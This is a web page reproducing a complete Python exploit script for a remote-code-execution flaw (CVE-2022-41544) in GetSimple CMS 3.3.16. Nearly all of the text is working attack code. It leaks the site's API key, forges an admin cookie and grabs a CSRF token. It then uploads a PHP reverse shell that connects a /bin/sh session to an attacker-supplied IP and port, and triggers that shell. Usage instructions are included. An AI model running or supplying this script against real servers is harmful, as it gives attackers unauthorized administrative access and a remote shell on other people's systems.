扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 |
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE) # Data: 18/5/2023 # Exploit Author : Youssef Muhammad # Vendor: Get-simple # Software Link: # Version app: 3.3.16 # Tested on: linux # CVE: CVE-2022-41544 import sys import hashlib import re import requests from xml.etree import ElementTree from threading import Thread import telnetlib purple = "\033[0;35m" reset = "\033[0m" yellow = "\033[93m" blue = "\033[34m" red = "\033[0;31m" def print_the_banner(): print(purple + ''' CCC V V EEEE22 000 22 2244115555 44 44 CV V E22 000 22 22 44 111544 44 C V VEEE--- 20 0 0 22--- 4444115554444 4444 CV V E 2 00022411 544 CCCVEEEE 22220002222 22224 11l1 555 44 '''+ reset) def get_version(target, path): r = requests.get(f"http://{target}{path}admin/index.php") match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text) if match: version = match.group(1) if version <= "3.3.16": print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544") else: print ("This is not vulnrable to this CVE") return version return None def api_leak(target, path): r = requests.get(f"http://{target}{path}data/other/authorization.xml") if r.ok: tree = ElementTree.fromstring(r.content) apikey = tree[0].text print(f"[+] apikey obtained {apikey}") return apikey return None def set_cookies(username, version, apikey): cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest() cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest() cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}" headers = { 'Content-Type':'application/x-www-form-urlencoded', 'Cookie': cookies } return headers def get_csrf_token(target, path, headers): r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers) m = re.search('nonce" type="hidden" value="(.*)"', r.text) if m: print("[+] csrf token obtained") return m.group(1) return None def upload_shell(target, path, headers, nonce, shell_content): upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true" payload = { 'content': shell_content, 'edited_file': '../shell.php', 'nonce': nonce, 'submitsave': 1 } try: response = requests.post(upload_url, headers=headers, data=payload) if response.status_code == 200: print("[+] Shell uploaded successfully!") else: print("(-) Shell upload failed!") except requests.exceptions.RequestException as e: print("(-) An error occurred while uploading the shell:", e) def shell_trigger(target, path): url = f"http://{target}{path}/shell.php" try: response = requests.get(url) if response.status_code == 200: print("[+] Webshell trigged successfully!") else: print("(-) Failed to visit the page!") except requests.exceptions.RequestException as e: print("(-) An error occurred while visiting the page:", e) def main(): if len(sys.argv) != 5: print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>") return target = sys.argv[1] path = sys.argv[2] if not path.endswith('/'): path += '/' ip, port = sys.argv[3].split(':') username = sys.argv[4] shell_content = f"""<?php $ip = '{ip}'; $port = {port}; $sock = fsockopen($ip, $port); $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes); """ version = get_version(target, path) if not version: print("(-) could not get version") return apikey = api_leak(target, path) if not apikey: print("(-) could not get apikey") return headers = set_cookies(username, version, apikey) nonce = get_csrf_token(target, path, headers) if not nonce: print("(-) could not get nonce") return upload_shell(target, path, headers, nonce, shell_content) shell_trigger(target, path) if __name__ == '__main__': print_the_banner() main() |
体验盒子
